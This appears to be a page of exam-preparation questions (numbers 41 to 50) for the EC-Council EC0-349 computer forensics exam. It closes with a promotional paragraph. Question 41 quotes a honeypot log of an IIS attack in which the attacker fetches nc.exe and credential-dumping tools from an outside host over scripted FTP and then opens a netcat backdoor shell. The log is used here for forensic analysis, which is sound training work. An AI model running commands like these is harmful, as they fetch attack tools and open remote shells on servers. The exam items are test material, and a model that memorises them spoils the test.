EC0-349 Exam Details

  • Exam Code
    :EC0-349
  • Exam Name
    :Computer Hacking Forensic Investigator
  • Certification
    :EC-COUNCIL Certifications
  • Vendor
    :EC-COUNCIL
  • Total Questions
    :325 Q&As
  • Last Updated
    :Jul 14, 2026

EC-COUNCIL EC0-349 Online Questions & Answers

  • Question 41:

    The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213. 116. 251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in

    arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a

    malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly.

    The attacker makes a RDS query which results in the commands run as shown below.

    "cmd1.exe /c open 213. 116. 251.162 >ftpcom"

    "cmd1.exe /c echo johna2k >>ftpcom"

    "cmd1.exe /c echo haxedj00 >>ftpcom"

    "cmd1.exe /c echo get nc.exe >>ftpcom"

    "cmd1.exe /c echo get pdump.exe >>ftpcom"

    "cmd1.exe /c echo get samdump.dll >>ftpcom"

    "cmd1.exe /c echo quit >>ftpcom"

    "cmd1.exe /c ftp -s:ftpcom"

    "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

    What can you infer from the exploit given?

    A. It is a local exploit where the attacker logs in using username johna2k
    B. There are two attackers on the system - johna2k and haxedj00
    C. The attack is a remote exploit and the hacker downloads three files
    D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

  • Question 42:

    Diskcopy is:

    A. a utility by AccessData
    B. a standard MS-DOS command
    C. Digital Intelligence utility
    D. dd copying tool

  • Question 43:

    George was recently fired from his job as an IT analyst at Pitts and Company in Dallas, Texas. His main duties as an analyst were to support the company's Active Directory structure and to create network policies. George now wants to break into the company network by cracking some of the service accounts he knows about. Which password cracking technique should George use in this situation?

    A. Brute force attack
    B. Syllable attack
    C. Rule-based attack
    D. Dictionary attack

  • Question 44:

    What will the following command accomplish? dd if=/dev/xxx of=mbr.backup bs=512 count=1

    A. Back up the master boot record
    B. Restore the master boot record
    C. Mount the master boot record on the first partition of the hard drive
    D. Restore the first 512 bytes of the first partition of the hard drive

  • Question 45:

    How often must a company keep log files for them to be admissible in a court of law?

    A. All log files are admissible in court no matter their frequency
    B. Weekly
    C. Monthly
    D. Continuously

  • Question 46:

    After attending a CEH security seminar, you make a list of changes you would like to perform on your network to increase its security. One of the first things you change is to switch the RestrictAnonymous setting from 0 to 1 on your servers. This, as you were told, would prevent anonymous users from establishing a null session on the server. Using Userinfo tool mentioned at the seminar, you succeed in establishing a null session with one of the servers. Why is that?

    A. RestrictAnonymous must be set to "10" for complete security
    B. RestrictAnonymous must be set to "3" for complete security
    C. RestrictAnonymous must be set to "2" for complete security
    D. There is no way to always prevent an anonymous null session from establishing

  • Question 47:

    Terri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls and switches to gain access to the network. Terri sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set. What is Terri trying to accomplish by sending this IP packet?

    A. Trick the switch into thinking it already has a session with Terri's computer
    B. Poison the switch's MAC address table by flooding it with ACK bits
    C. Crash the switch with a DoS attack since switches cannot send ACK bits
    D. Enable tunneling feature on the switch

  • Question 48:

    What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 sever the course of its lifetime?

    A. forensic duplication of hard drive
    B. analysis of volatile data
    C. comparison of MD5 checksums
    D. review of SIDs in the Registry

  • Question 49:

    Printing under a Windows Computer normally requires which one of the following files types to be created?

    A. EME
    B. MEM
    C. EMF
    D. CME

  • Question 50:

    Why should you note all cable connections for a computer you want to seize as evidence?

    A. to know what outside connections existed
    B. in case other devices were connected
    C. to know what peripheral devices exist
    D. to know what hardware existed

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only EC-COUNCIL exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your EC0-349 exam preparations and EC-COUNCIL certification application, do not hesitate to visit our Vcedump.com to find your solutions here.